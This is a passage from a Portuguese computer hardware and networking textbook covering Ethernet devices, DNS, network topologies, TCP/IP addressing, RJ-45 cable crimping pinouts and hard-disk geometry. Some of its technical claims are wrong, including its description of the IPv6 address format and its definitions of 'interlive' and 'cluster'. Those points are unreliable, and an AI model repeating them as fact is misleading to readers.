mudança para um padrão que facilite a vida dos usuários? Com tan-
tos avanços nas interfaces de programas, com o intuito de facilitar
para o usuário, porque o teclado está parado no tempo?

Pinagem em USB

Redes

As redes são um campo cada vez mais importante. Basta lembrar


que a Internet, tão essencial hoje em dia, nada mais é do que uma
rede de computadores.

227
Existem várias arquiteturas de rede e novas são criadas a cada dia,
mas felizmente, a tendência é que sempre um único ou alguns pou-
cos padrões sobrevivam em cada área.
O padrão Ethernet por exemplo se tornou quase onipresente nas
redes cabeadas. Isso trouxe algo muito positivo, que foi a facilidade
em montar redes. Como todas as placas são compatíveis e os cabos
são padronizado, é muito fácil encontrar os componentes.

Temos três padrões de redes Ethernet: de 10 megabits, 100 megabits


e 1 gigabit. As placas são intercompatíveis, mas ao combinar placas
de velocidades diferentes, a rede passa a operar na velocidade da
placa mais lenta, a menos que você invista num switch, que é capaz
de isolar as transmissões, permitindo que cada placa opere na sua
velocidade, sem prejudicar as demais.

Um switch é uma espécie de irmão mais velho do hub, os dois tem a


mesma função, ou seja, servir como um ponto central para a rede.
Todas as placas de rede são ligadas ao hub ou switch e é possível
ligar vários hubs ou switchs entre si caso necessário.

A diferença é que o hub apenas retransmite tudo o que recebe para


todas as estações. Isto significa que apenas uma pode falar de cada
vez e que todas precisam operar na mesma velocidade (sempre nive-
lada por baixo). Isto funciona bem em pequenas redes, mas conforme
o número de PCs aumenta, o desempenho diminui rapidamente.

Surgem então os switchs, aparelhos mais inteligentes, que são capa-


zes de estabelecer ligações apenas entre o emissor e o destinatário
da transmissão. Isso permite que várias transmissões sejam feitas ao
mesmo tempo (entre PCs diferentes naturalmente) e cada placa pode
operar na sua velocidade máxima. Usando switch o desempenho da
rede se mantém com um número muito maior de estações.

Os hubs são atualmente muito baratos, entre 60 e 200 reais, mas o


switchs podem ser muito mais caros, chegando facilmente aos 500
reais.

228
Finalmente, temos os roteadores, que são o top da cadeia evolutiva.
Os roteadores são ainda mais inteligentes, pois são capazes de inter-
ligar várias redes diferentes e sempre escolher a rota mais rápida
para cada pacote de dados. Os roteadores podem ser desde PCs
comuns, com duas ou mais placas de rede até supercomputadores
capazes de gerenciar milhares de links de alta velocidade. Os rotea-
dores formam a espinha dorsal da Internet.

Finalmente, temos as redes sem fio, que estão em rápida ascensão,


lideradas pelas placas 802.11b. Isso mesmo, “802.11b”. esqueceram
de inventar um nome mais familiar para o padrão, mas enfim, o que
importa é o que ele faz.

Os transmissores 802.11b são bastante compactos, a ponto de cabe-


rem num cartão PC-Card, que pode ser instalado em qualquer note-
book. Existem ainda placas para micros de mesa, assim como adap-
tadores, que permitem usar os cartões em micros de mesa.

Ao invés do Hub temos o ponto de acesso, que é capaz de centralizar


as transmissões de dados de algumas dezenas de estações.

Ponto de acesso e placa PC-Card

229
A velocidade é de 11 megabit, um pouco mais que as redes Ethernet
de 10 megabits e o alcance varia entre 15 e 100 metros, dependendo
dos obstáculos. A grandes distâncias o sinal se degrada e a velocida-
de de transmissão diminui, até o sinal se perder completamente.

Além dos notebooks, as interfaces 802.11b podem ser usadas em


alguns handhelds e se tornam cada vez mais populares.

Os pontos de acesso quase sempre podem ser conectados a uma


rede Ethernet já existente, unificando as duas redes. Isto permite que
num escritório você possa ligar os desktops usando uma rede Ether-
net convencional, que é mais rápida e mais barata e usar a rede sem
fio apenas para os notebooks.

Além dos componentes físicos da rede serem quase sempre inter-


compatíveis, os sistemas operacionais atualmente também são.

Com um pouco de conhecimento de causa, você não terá maiores


problemas para interligar um PC rodando Windows, outro rodando
Linux e um Macintosh na mesma rede, trocar arquivos e compartilhar
a conexão com a Internet entre eles.

Alguns termos que você precisa ter em mente:

TCP/IP – É o principal protocolo de rede, usado na grande maioria


das rede locais. O protocolo é justamente a língua universal que per-
mitem que vários sistemas diferentes possam conversar.

ICS – É o programa, presente no Windows 98 SE, Windows ME,


Windows 2000 e Windows XP, etc. Que permite compartilhar a cone-
xão com a Internet. Os clientes podem rodar Linux, Mac OS ou vários
outros sistemas, pois tudo é feito via TCP/IP, que é universal.

Samba – Este é o software que permite compartilhar arquivos entre


máquinas Linux e Windows. Roda no Linux.

Compartilhamento – Seja no Windows ou no Linux, tudo que for ser


acessado por outros micros da rede é chamado de compartilhamento.
Você pode compartilhar arquivos (pastas, ou até mesmo o HD intei-

230
ro), CD-ROM, Impressora, etc. Da até para usar o PC remotamente,
através do VNC.

Barramentos
Conheça os detalhes técnicos sobre o funcionamento dos barramen-
tos existentes em uma placa de CPU moderna: barramento local,
barramento de memória, AGP, PCI, AMR, etc. Essas informações
ajudarão você a entender mais a fundo o funcionamento de uma pla-
ca de CPU, e também do computador.

DNS
O que é e como ele pode acelerar sua internet.

Uma das partes fundamentais da infraestrutura mundial da internet é


o DNS. Essa sigla significa “Domain Name System” (algo como “sis-
tema de nome de domínio”), e se refere a um sistema responsável
por facilitar em muito a forma como usamos a internet.

A seguir, descubra o que é o DNS e como é possível mudar o seu


para navegar mais rápido.

IPs e nomes

Todos os aparelhos conectados à internet, desde o maior servidor até


o menor smartphone, possuem um número que serve como seu “en-
dereço” na internet. Esse número se chama IP, de “Internet Proto-
col” (ou “protocolo de internet”).

Os sites que acessamos na internet também possuem IPs. É por


meio desses IPs, aliás, que conseguimos acessá-los. O do Facebo-
ok.com.br, por exemplo, é 173.252.88.66; o do Google.com.br, por
sua vez, é 74.125.129.94, e o do Olhar Digital é 200.147.3.199. Se
tiver curiosidade, você consegue descobrir o IP de outras páginas por
meio desse site:
https://www.site24x7.com/find-ip-address-of-web-site.html.

Os IPs listados acima estão ainda no formado IPv4. Atualmente, a


internet está em um processo de transição do IPv4 para o IPv6. Os

231
endereços de IPv6 têm o formato de quatro grupos de oito caracteres,
e os caracteres pode ser números de 0 a 9 ou letras de A até F.

Mas você sabe que não é necessário saber o IP de um site para


acessá-lo. Para isso, basta saber o “nome” dele (como
www.facebook.com.br ou www.google.com.br).

Isso é possível por conta do DNS. O DNS traduz os “nomes” de


sites em IPs, para que nós possamos navegar pelos nossos sites
favoritos sem precisar decorar um monte de longas séries de núme-
ros e letras. É possível pensar no DNS como uma espécie de lista
telefônica que liga cada site a seu IP.

Descobrindo os IPs

Apesar dessa analogia, o DNS não é meramente um arquivo que


você pode deixar salvo em seu computador. Isso não apenas pelo
fato de que seria um arquivo consideravelmente grande, mas também
porque a internet muda muito, e muito rapidamente, portanto seria
necessário atualizá-lo constantemente.

Para descobrir o IP de um site a partir do “nome” dele e, com isso,


conectar o usuário ao site) são necessárias uma série de medidas,
tomadas em conjunto pelo seu navegador e o seu sistema operacio-
nal, com o auxílio de uma série de servidores pelo caminho.

Vamos supor, por exemplo, que você deseja acessar o Youtube. En-
tão, você digita na sua barra de endereços: www.youtube.com.
Quando você faz isso, a primeira coisa que o seu navegador faz é
perguntar ao seu sistema operacional se ele já conhece o IP relacio-
nado àquele nome. Para isso, eles verificam se essa informação já
está na memória ou no “cache” do seu computador, como o Youtube
é um site bem popular, provavelmente ele já estará lá.

Se o seu sistema operacional não conhece o IP relacionado àquele


nome, ele pergunta a um servidor de nomes de domínio, ou Do-
main Name Servers (também conhecido como servidores DNS). Os
provedores de acesso à internet e fabricantes de computadores em

232
geral já configuram as máquinas com um servidor DNS, então seu
computador já saberá a quem perguntar.

É possível que o servidor DNS possua esse endereço já no cache


dele (e, de novo, no caso do Youtube, isso é bem provável). Se ele
não souber, no entanto, ele saberá encontrar o servidor de nomes de
raíz (ou Root Names Server).

Esse servidor é responsável pela localização dos servidores de do-


mínios de alto nível, tais como .com ou .org, chamados servidores
de TLD (de Top-Level Domain, ou domínio de alto nível)

O servidor de nomes de raiz direcionará o seu servidor DNS ao servi-


dor de nomes de alto nível .com (já que o endereço termina em
.com). E então, o servidor TLD responsáveis pelos endereços .com o
direcionará ao servidor de nomes com autoridade (ou ANS, de
“authoritative name server”) responsável pelo endereço youtube.com.

O ANS dirá então ao servidor DNS o IP que corresponde ao nome


“www.youtube.com” (no caso, é 216.58.192.46). O servidor DNS de-
volve essa informação para o seu sistema operacional, que a devolve
ao seu navegador, que então consegue te conectar ao Youtube. Por
mais enrolado que esse processo pareça, ele geralmente acontece
em menos de um segundo.

Como deve ter ficado claro, o servidor DNS tem um belo de um traba-
lho para conseguir traduzir os nomes que o navegador manda para
ele em IPs por meio dos quais seja possível acessar os site. Por esse
motivo, a velocidade de sua navegação pode variar bastante depen-
dendo de qual servidor DNS a sua rede doméstica está configurada
para usar.

Imagine, por exemplo, se ela estiver usando um servidor DNS hospe-


dado na Alemanha. Toda vez que o seu navegador solicitar um IP
que não esteja na memória do seu computador, a solicitação precisa-
rá viajar até o outro lado do mundo e voltar antes de que você possa
se conectar!

233
Felizmente, existe um programa simples chamado Namebench que
ajuda a encontrar o servidor DNS mais rápido para a sua rede. Nós já
falamos sobre ele, mas vale a pena falar novamente. Ele está dispo-
nível para:

Windows
https://code.google.com/p/namebench/downloads/detail?name=name
bench-1.3.1-Windows.exe&.

Mac
https://code.google.com/p/namebench/downloads/detail?name=name
bench-1.3.1-Mac_OS_X.dmg&can=2&q.

Linux
https://code.google.com/p/namebench/downloads/detail?name=name
bench-1.3.1-source.tgz&can=2&q=

O que o Namebench faz é, basicamente, testar uma série de servido-


res DNS diferentes para ver qual deles responde mais rápido.

Caso o servidor DNS apontado como o mais rápido pelo Namebench


não seja o que você está utilizando atualmente, pode ser que as alte-
rações necessárias precisem ser feitas em seu roteador, e não em
seu computador. Nesse caso, o procedimento varia de acordo com
cada modelo, mas pesquisar no Google o nome do modelo deve tra-
zer alguma indicação de como alterá-lo.

Tipos de Redes

LAN - (Local Area Network) – Rede de Área Local de pequeno


alcance.

São os tipos de redes utilizadas para realizar a conexão de um grupo


de computadores com a finalidade de trocarem informações entre
eles.

Esse tipo de rede tem denominação de local por cobrir apenas uma
área de no máximo 10 km.

234
Composição:
Servidores: São computadores de alta capacidade de processamento
e armazenamento de dados, cujo principal objetivo é prover diversos
tipos de informações.

Estações: São as estações de trabalho conectadas a rede.

Sistemas operacionais de rede: É um software que tem como função


dar suporte a rede.

Meio de transporte: É a forma pela qual as informações circulam pela


rede, podem operar nas velocodades de 10 a 10000 Mbps.

Dispositivo de rede: É o meio pelo qual o servidor e as estações se


conectam (hub, roteadores, switch, etc.).

Protocolo de comunicação: É o “idioma” pelo qual os dispositivos se


comunicam.

MAN – (Metropolitan Area Network) - Rede de área Metropolitra-


na.

São redes de alcance médio, constituídas por várias LANs e interliga-


das na mesma cidade. Podemos citar como exemplo as prefeituras
que interligam vário setores, como saúde, turismo etc.

WAN – (Wide Area Network) - Rede de grande área, longa distân-


cia.

Esse tipo de rede é que deu origem ao crescimento da internet, mas


a grande utilização dessa rede é por empresas que necessitam ex-
pandir com filiais, em diversos estados ou países.

Pontos para o correto funcionamento:


Tráfego, que devido ao aumento do fluxo de dados, sofrem congesti-
onamento, que é definido com o QoS (Quality of Service). É uma
expressão utilizada para definir a qualidade do serviço utilizado por
uma WAN.

235
Além desse ponto podemos observar os protocolos disponíveis:

PPP – (Point-to-Point Protocol) – Protocolo comum usado para cesso


discado;
Frame Realy – Técnica de comunicação de pacotes;
ATM – (Asynchronous Transfer Mode) – Tecnologia de transmissão e
computação de dados;
xDSL – (Acesso Remoto com Digital Subscribe Line) – Tráfego de
alta capacidade utilizando o cabo telefônico;
ADSL – (Asymmetric Digital Subscribe Line) – Capacidade assimétri-
ca;
HDSL – (Hight-Bit-Rate Digital Subscribe Line) – Capacidade simétri-
ca: 2Mbps usando 3 pares.

Meios de comunicação:
Linha telefônica;
Cabos;
Rádio;
Satélite.

Topologias de redes:

Topologia em anel – Uma topologia em anel consiste em uma rede


de estações conectadas em um circuito fechado, como se estivessem
ligados em série. São capazes de transmitir e receber dados em
qualquer dreção, mas os mais utilizados são os unidirecionais, assim
essa topologia não precida de roteadores.

As vantagens são em termos de custo e praticidade na montagem da


rede, já que utiliza um único cabo para as conexões.

As desvantagens é que trabalhando em unidirecional, falhando uma


das esações a rede para de funcionar por completo.

Topologia em barra – Foi muito utilizada durante alguns anos, essa


rede é montada com cabo coaxial e utiliza conectores BNC, um tipo
de conector em T. Na ponta final do cabeamento, conecta-se um
conector chamado de “BNC terminator”, ou terminal de fim de linha.

236
Topologia estrela – É o tipo mais utilizado atualmente, as estações
são conectadas através de um concentrador (hub ou switch), e todas
as estações podem se comunicar entre sí.

A grande vantagem desta topologia é que se uma ou mais estações


apresentarem defeito, a rede não para, permanece se comunicando
com as estações ativas.

Topologia ponto a ponto – É o tipo de comunicação executada en-


tre dois computadores através de um cabo cross, um tipo de cabo
específico para essa função.

Periféricos de rede:

HUB – Dispositivos mais usados em topologias em estrela, ou tam-


bém chamadas de árvore.

Switch – São bem parecidos com os HUB e com as mesmas fun-


ções, o que o diferencia é o gerenciamento de pacotes.

Roteadores – Os mais comuns e encontrados normalmente são os


ADSL, Ethernet, Wireless, etc., cuja função é fazer a conexão entre
diferentes redes de computadores distantes entre sí e até mesmo
usando protocolos diferentes.

Repetidores – Equipamento utilizado quando a distância entre dois


pontos é superior ao recomendado, ele recebe um sinal já fraco e o
reenvia para que este não se perca durante o tráfego pela rede.

Meios de transmissão:

Cabo coaxial – Com redes de computadores esse cabo é utilizado


na topologia em barra ou em anel.

Par de fios, ou par trançado – É atualmente o sistema mais utilizado


em redes internas de computadores, consiste em 8 fios separados
em 4 pares. Sua utilização depende de um HUB, Switch ou roteador,
a única exceção é se utilizado na topologia ponto a ponte através de
uma configuração com cabo cross.

237
Fibras óticas – A fibra é um filamento feito de vidro ou material poli-
métrico, com capacidade de transmitir sinais de luz po ele. A grande
vantagem deste tipo de cabo é ele não receber interferências exper-
nas e ser adaptável à temperatura ambiente.

Protocolo TCP/IP:

Essa arquitetura surgiu por causa do Departamento de Defesa dos


Estados Unidos da América (DoD) – (Department of Defense), com o
objetivo de manter conectados órgãos do governo e universidades.

A ARPANET surgiu como uma rede que permaneceria ativa caso um


dos servidores perdesse a conexão, para isso surgiram os protocolos
que assegurassem confiabilidade e estabilidade, foi desenvolvida
então a arquitetura TCP/IP.

TCP – É um protocolo de camada de transporte confiável, garante a


entrega dos pacotes, assegura o sequenciamento dos pacotes e pro-
videncia uma checagem que valida os dados. Na falha de um pacote,
o TCP retransmite o pacote.

IP – É o protocolo de camada da internet encarregado da entrega de


pacotes para todos os outros protocolos da família TCP/IP.

O endereço IP é formado por um número de 32 Bits no formato


“nnn.nnn.nnn.nnn” onde “nnn” pode variar de 0 a 255. Pelo menos em
teoria é possível construir uma rede com até 4.294.967.296 endere-
ços IP, isso porque alguns endereços são reservados e não podem
ser usados.

O novo endereço IP ainda não esta sendo usado comercialmente, é


conhecido como IPng (IP Next Generation), SIPP (Simple Internet
Protocol Plus) ou simplesmente IPv6.

Limites de endereços reservados para cada classe


Classe Endereço mais baixo Endereço mais alto
A 10.0.0.0 10.255.255.255
B 172.16.0.0 172.31.255.255

238
C 192.168.0.0 192.168.255.255

Máscara de Rede

Sua função é de informar quais partes do endereço IP identificam as


redes e as máquinas. A máscara é formada por 32 Bits, assim como
acontece com o endereço IP.

Classe A – 255.0.0.0
Classe B – 255.255.0.0
Classe C – 255.255.255.0

Crimpando (ou clipando) cabos de redes

A ferramenta básica para crimpar os cabos é o alicate de crimpagem.


Ele "esmaga" os contatos do conector, fazendo com que as facas-
contato perfurem a cobertura plástica e façam contato com os fios do
cabo de rede:

É possível comprar alicates de crimpagem razoáveis por pouco mais


de 50 reais, mas existem alicates de crimpagem para uso profissional
que custam bem mais. Existem ainda "alicates" mais baratos, com o

239
corpo feito de plástico, que são mais baratos, mas não valem o pape-
lão da embalagem. Alicates de crimpagem precisam ser fortes e pre-
cisos, por isso evite produtos muito baratos.

Ao crimpar os cabos de rede, o primeiro passo é descascar os cabos,


tomando cuidado para não ferir os fios internos, que são bastante
finos. Normalmente, o alicate inclui uma saliência no canto da guilho-
tina, que serve bem para isso. Existem também descascadores de
cabos específicos para cabos de rede, que são sempre um item bem-
vindo na caixa de ferramentas:

Os quatro pares do cabo são diferenciados por cores. Um par é laran-


ja, outro é azul, outro é verde e o último é marrom. Um dos cabos de
cada par tem uma cor sólida e o outro é mais claro ou malhado, mis-

240
turando a cor e pontos de branco. É pelas cores que diferenciamos os
8 fios.

O segundo passo é destrançar os cabos, deixando-os soltos. Para


facilitar o trabalho, descasque um pedaço grande do cabo, uns 5 ou 6
centímetros, para poder organizar os cabos com mais facilidade e
depois corte o excesso, deixando apenas a meia polegada de cabo
(1.27 cm, ou menos) que entrará dentro do conector.

O próprio alicate de crimpagem inclui uma guilhotina para cortar os


cabos, mas operá-la exige um pouco de prática, pois você precisa
segurar o cabo com uma das mãos, mantendo os fios na ordem cor-
reta e manejar o alicate com a outra. A guilhotina faz um corte reto,
deixando os fios prontos para serem inseridos dentro do conector,
você só precisa mantê-los firmes enquanto encaixa e crimpa o conec-
tor.

Existem dois padrões para a ordem dos fios dentro do conector, o EIA
568B (o mais comum) e o EIA 568A. A diferença entre os dois é que
a posição dos pares de cabos laranja e verde são invertidos dentro do
conector.

Existe muita discussão em relação com qual dos dois é "melhor", mas
na prática não existe diferença de conectividade entre os dois pa-

241
drões. A única observação é que você deve cabear toda a rede utili-
zando o mesmo padrão. Como o EIA 568B é de longe o mais comum,
recomendo que você o utilize ao crimpar seus próprios cabos.

Uma observação é que muitos cabos são certificados para apenas


um dos dois padrões; caso encontre instruções referentes a isso nas
especificações, ou decalcadas no próprio cabo, crimpe os cabos
usando o padrão indicado.

No padrão EIA 568B, a ordem dos fios dentro do conector (em ambos
os lados do cabo) é a seguinte:

1-Branco com Laranja


2- Laranja
3- Branco com Verde
4- Azul
5- Branco com Azul
6- Verde
7- Branco com Marrom
8- Marrom

Os cabos são encaixados nessa ordem, com a trava do conector


virada para baixo, como no diagrama:

Ou seja, se você olhar o conector "de cima", vendo a trava, o par de


fios laranja estará à direita e, se olhar o conector "de baixo", vendo os
contatos, eles estarão à esquerda. Este outro diagrama mostra me-
lhor como fica a posição dos cabos dentro do conector:

242
O cabo crimpado com a mesma disposição de fios em ambos os la-
dos do cabo é chamado de cabo "reto", ou straight. Este é o tipo
"normal" de cabo, usado para ligar os micros ao switch ou ao roteador
da rede. Existe ainda um outro tipo de cabo, chamado de "cross-
over" (também chamado de cabo cross, ou cabo cruzado), que per-
mite ligar diretamente dois micros, sem precisar do hub ou switch. Ele
é uma opção mais barata quando você tem apenas dois micros.

No cabo cruzado, a posição dos fios é diferente nos dois conectores,


de forma que o par usado para enviar dados (TX) seja ligado na posi-
ção de recepção (RX) do segundo micro e vice-versa. De um dos
lados a pinagem é a mesma de um cabo de rede normal, enquanto
no outro a posição dos pares verde e laranja são trocados. Daí vem o
nome cross-over, que significa, literalmente, "cruzado na ponta":

Esquema dos contatos de envio e recepção em um cabo cross-over

Para fazer um cabo cross-over, você crimpa uma das pontas seguin-
do o padrão EIA 568B que vimos acima e a outra utilizando o padrão
EIA 568A, onde são trocadas as posições dos pares verde e laranja:

243
1- Branco com Verde
2- Verde
3- Branco com Laranja
4- Azul
5- Branco com Azul
6- Laranja
7- Branco com Marrom
8- Marrom

A maioria dos switches atuais são capazes de "descruzar" os cabos


automaticamente quando necessário, permitindo que você misture
cabos normais e cabos cross-over dentro do cabeamento da rede.
Graças a isso, a rede vai funcionar mesmo que você use um cabo
cross-over para conectar um dos micros ao hub por engano.

Este cabo cross-over "clássico" pode ser usado para ligar placas de
10 ou 100 megabits, onde as transmissões são na realidade feitas
usando apenas dois dos pares dos cabos. Placas e switches Gigabit
Ethernet utilizam os quatro pares e por isso precisam de um cabo
cross-over especial, crimpado com uma pinagem diferente. Usando
um cabo cross convencional, a rede até funciona, mas as placas são
forçadas a reduzir a velocidade de transmissão para 100 megabits,
de forma a se adaptarem ao cabeamento.

Para fazer um cabo cross-over Gigabit Ethernet, você deve utilizar o


padrão EIA 568B (Branco com Laranja, Laranja, Branco com Verde,
Azul, Branco com Azul, Verde, Branco com Marrom, Marrom) de um
dos lados do cabo, como usaria ao crimpar um cabo normal. A mu-
dança vem ao crimpar o outro lado do cabo, onde é usada a seguinte
pinagem:

1- Branco com Verde


2- Verde
3- Branco com Laranja
4- Branco com Marrom
5- Marrom
6- Laranja

244
7- Azul
8- Branco com Azul

Muitos switches e também algumas placas Gigabit podem ser ligados


diretamente usando cabos straight, pois os transmissores são capa-
zes de ajustar a transmissão via software, recurso chamado de Auto-
MDI/MDI-X. Entretanto, nem todos os dispositivos suportam o recur-
so, de forma que os cabos cross-over ainda são necessários em di-
versas situações.

Revisando, os padrões para os três tipos de cabos são:

Cabo straight (10, 100 ou 1000 megabits):


1- Branco com Laranja 1- Branco com Laranja
2- Laranja 2- Laranja
3- Branco com Verde 3- Branco com Verde
4- Azul 4- Azul
5- Branco com Azul 5- Branco com Azul
6- Verde 6- Verde
7- Branco com Marrom 7- Branco com Marrom
8- Marrom 8- Marrom

Cabo cross-over (10 ou 100 megabits):


1- Branco com Laranja 1- Branco com Verde
2- Laranja 2- Verde
3- Branco com Verde 3- Branco com Laranja
4- Azul 4- Azul
5- Branco com Azul 5- Branco com Azul
6- Verde 6- Laranja
7- Branco com Marrom 7- Branco com Marrom
8- Marrom 8- Marrom

Cabo cross-over para Gigabit Ethernet

245
1- Branco com Laranja 1- Branco com Verde
2- Laranja 2- Verde
3- Branco com Verde 3- Branco com Laranja
4- Azul 4- Branco com Marrom
5- Branco com Azul 5- Marrom
6- Verde 6- Laranja
7- Branco com Marrom 7- Azul
8- Marrom 8- Branco com Azul

Ao crimpar, você deve retirar apenas a capa externa do cabo e não


descascar individualmente os fios, pois isso, ao invés de ajudar, ser-
viria apenas para causar mau contato, deixando frouxo o encaixe com
os pinos do conector.

A função do alicate é fornecer pressão suficiente para que os pinos


do conector RJ-45, que internamente possuem a forma de lâminas,
esmaguem os fios do cabo, alcançando o fio de cobre e criando o
contato:

Como os fios dos cabos de rede são bastante duros, é preciso uma
boa dose de força para que o conector fique firme, daí a necessidade
de usar um alicate resistente. Não tenha medo de quebrar ou danifi-
car o alicate ao crimpar, use toda a sua força:

246
É preciso um pouco de atenção ao cortar e encaixar os fios dentro do
conector, pois eles precisam ficar perfeitamente retos. Isso demanda
um pouco de prática. No começo, você vai sempre errar algumas
vezes antes de conseguir.

Veja que o que protege os cabos contra as interferências externas


são justamente as tranças. A parte destrançada que entra no conec-
tor é o ponto fraco do cabo, onde ele é mais vulnerável a todo tipo de
interferência. Por isso, é recomendável deixar o menor espaço possí-
vel sem as tranças. Para crimpar cabos dentro do padrão, você preci-
sa deixar menos de meia polegada de cabo (1.27 cm) destrançado.
Você só vai conseguir isso cortando o excesso de cabo solto antes de
encaixar o conector, como na foto:

Outra observação é que, além de ser preso pelos conectores metáli-


cos, o cabo é preso dentro do conector através de uma trava plástica,
que é também presa ao crimpar o cabo. A trava prende o cabo atra-
vés da cobertura plástica, por isso é importante cortar todo o excesso

247
de cabo destrançado, fazendo com que parte da cobertura plástica
fique dentro do conector e seja presa pela trava. Sem isso, os conta-
tos podem facilmente ser rompidos com qualquer esbarrão, tornando
a rede como um todo menos confiável.

Além do cabo e do conector RJ-45, existem dois acessórios, que


você pode ou não usar em seus cabos, conforme a disponibilidade. O
primeiro são as capas plásticas (boots), que são usadas nas pontas
dos cabos para melhorar o aspecto visual. Por estarem disponíveis
em várias cores, elas podem ser também usadas para identificar os
cabos, mas com exceção disso elas são puramente decorativas, não
possuem nenhuma outra função. Para usá-las, basta colocar a capa
antes do conector:

Boots

O segundo são os inserts, que são um tipo de suporte plástico que


vai dentro do conector. Depois de destrançar, organizar e cortar o
excesso de cabo, você passa os 8 fios dentro do insert e eles os
mantêm na posição, facilitando o encaixe no conector.

Os conectores RJ-45 projetados para uso em conjunto com o insert


possuem um espaço interno maior para acomodá-lo. Devido a isso,
os inserts são fornecidos em conjunto com alguns modelos de conec-
tores e raramente são vendidos separadamente:

248
Insert

O primeiro teste para ver se os cabos foram crimpados corretamente


é conectar um dos micros (ligado) ao switch e ver se os LEDs da
placas de rede e do hub acendem. Isso mostra que os sinais elétricos
enviados estão chegando até o switch e que ele foi capaz de abrir um
canal de comunicação com a placa.

Se os LEDs nem acenderem, então não existe o que fazer. Corte os


conectores e tente de novo. Infelizmente, os conectores são descar-
táveis: depois de crimpar errado uma vez, você precisa usar outro
novo, aproveitando apenas o cabo. Mais um motivo para prestar
atenção.

Existem também aparelhos testadores de cabos, que oferecem um


diagnóstico muito mais sofisticado, dizendo, por exemplo, se os ca-
bos são adequados para transmissões a 100 ou a 1000 megabits e
avisando caso algum dos 8 fios do cabo esteja rompido. Os mais
sofisticados avisam inclusive em que ponto o cabo está rompido,
permitindo que você aproveite a parte boa.

Testador de cabos

249
Esses aparelhos serão bastante úteis se você for crimpar muitos ca-
bos, mas são dispensáveis para trabalhos esporádicos, pois é muito
raro que os cabos venham com fios rompidos de fábrica. Os cabos de
rede apresentam também uma boa resistência mecânica e flexibilida-
de, para que possam passar por dentro de tubulações. Quase sempre
os problemas de transmissão surgem por causa de conectores mal
crimpados.

Existem ainda modelos mais simples de testadores de cabos, que


chegam a custar em torno de 20 reais. Eles realizam apenas um teste
de continuidade do cabo, checando se o sinal elétrico chega até a
outra ponta e, verificando o nível de atenuação, para certificar-se de
que ele cumpre as especificações mínimas. Um conjunto de 8 leds se
acende, mostrando o status de cada um dos 8 fios. Se algum fica
apagado durante o teste, você sabe que o fio correspondente está
partido. A limitação é que eles não são capazes de calcular em que
ponto o cabo está partido, de forma que a sua única opção acaba
sendo trocar e descartar o cabo inteiro.

Uma curiosidade com relação aos testadores é que algumas placas-


mãe da Asus, com rede Yukon Marvel (e, eventualmente, outros mo-
delos lançados futuramente), incluem um software testador de cabos,
que pode ser acessado pelo setup, ou através de uma interface den-
tro do Windows. Ele funciona de uma forma bastante engenhosa.
Quando o cabo está partido em algum ponto, o sinal elétrico percorre
o cabo até o ponto onde ele está rompido e, por não ter para onde ir,
retorna na forma de interferência. O software cronometra o tempo que
o sinal demora para ir e voltar, apontando com uma certa precisão
depois de quantos metros o cabo está rompido.

Outra dica é que no padrão 100BASE-TX são usados apenas os pa-


res laranja e verde para transmitir dados. Você pode tirar proveito
disso para fazer um cabo mini-crossover para levar na sua caixa de
ferramentas, usando apenas os pares laranja e verde do cabo. De um
lado a pinagem seria: branco com laranja, laranja, branco com verde,
nada, nada, verde, nada, nada; e do outro seria: branco com verde,
verde, branco com laranja, nada, nada, laranja, nada, nada:

250
Cabo cross de emergência, feito com apenas dois dos pares do cabo

Este é um cabo fora do padrão, que não deve ser usado em instala-
ções, mas, em compensação, ocupa um volume muito menor e pode
ser útil em emergências.

Outro componente que pode ser útil em algumas situações é o conec-


tor de loopback, que é usado por programas de diagnóstico para tes-
tar a placa de rede. Ele é feito usando um único par de fios, ligado
nos contatos 1, 2, 3 e 6 do conector, de forma que os dois pinos usa-
dos para enviar dados sejam ligados diretamente nos dois pinos de
recepção, fazendo com que a placa receba seus próprios dados de
volta:

Conector de loopback

A pinagem do conector de loopback é:


1- Branco com laranja ...................................... TX - 1
2- Laranja ......................................................... TX - 2
3- Branco com laranja (retornando) ................. RX - 1
4- nada
5- nada

251
6- Laranja (retornando) .................................... RX - 2
7- nada
8- nada

Ao plugar o conector na placa de rede, você notará que o link da rede


é ativado. Ao usar o comando "mii-tool" no Linux, por exemplo, você
teria um "eth0: no link" com o cabo de rede desconectado e passaria
a ter um "eth0: negotiated 100baseTx-FD, link ok" depois de encaixar
o conector de loopback.

Composição Física e Lógica

Trilhas (lógica)

Áreas cilíndricas criadas no disco, por formatação, reservadas para a


gravação magnética de dados. Nestas trilhas constam os dados refe-
rentes aos arquivos gravados, exceção que se faz à trilha 00, nesta,
ficam gravados os dados referentes ao HD (Hard Disk), como: Defei-
tos de fabricação, quantidade de trilhas, setores por trilha, cluster,
interlive, cabeças, índice dos arquivos, endereços e bootstrape.

Cilindro (lógica)

É a união de todas as trilhas de mesmo número. Supondo um HD


(Hard Disk) com empilhamento de 5 discos, cada um destes discos
terá uma trilha 00, uma 01, uma 02, até o limite estabelecido pelo
fabricante. A união lógica de todas as trilhas 00, ou 01, ou 02, etc.
dos cinco discos chama-se cilindro.

Cabeças (física)

Parte móvel do HD (Hard Disk) ou das unidades de disquete que


efetua a leitura e gravação de dados. Estas cabeças, convém salien-
tar, não tocam os discos. Se acontecer, por falha mecânica, que uma
destas cabeças encoste no disco, certamente isto causará um risco
na superfície do disco, diz-se então que a cabeça aterrissou no disco.
Normalmente a expressão "a cabeça aterrissou no disco" significa a
inutilização do disquete ou do HD (Hard Disk).

252
Setores (lógica)

Áreas criadas pela formatação, sobre as trilhas, dividindo as mesmas


em espaços iguais. Imagine um disco onde em sua superfície foram
criadas logicamente 40 circunferências, ou seja, 40 trilhas e estas
trilhas divididas em setores, (como uma maçã fatiada). No exemplo
abaixo temos 8 setores por trilha.

Setores

Trilhas

Separação lógica de setores

AFASTAMENTO APROXIMADO DA CABEÇA


Suporte da cabeça

Cabeça de leit./grav. Cabelo humano Partícula de poeira


Partícula de fumo Impressão digital Superfície do disco

Cluster (lógica)

Áreas criadas pela formatação, sobre as trilhas e dentro dos setores,


onde serão feitas as gravações de dados. Cada segmento de trilha
dentro de um setor, é seccionado em espaços chamados de cluster, e
dentro destes pequenos espaços ficam as informações gravadas em
forma magnética.

253
Interlive (física)

É a sensibilidade de leitura e gravação em discos, tem a ver com o


material empregado na fabricação dos discos do HD (Hard Disk).

Media (física)

Deve-se ler "MIDIA", São os discos de leitura e gravação do HD


(Hard Disk).

Trilha 00 (lógica)

É a primeira trilha de gravação de dados em disco, na qual estão


todos as informações relativas ao HD (Hard Disk) ou disquete, tais
como:

Tamanho do disco (capacidade em Kb.)


Quantidade de cilindros ou trilhas
Quantidade de setores por trilha
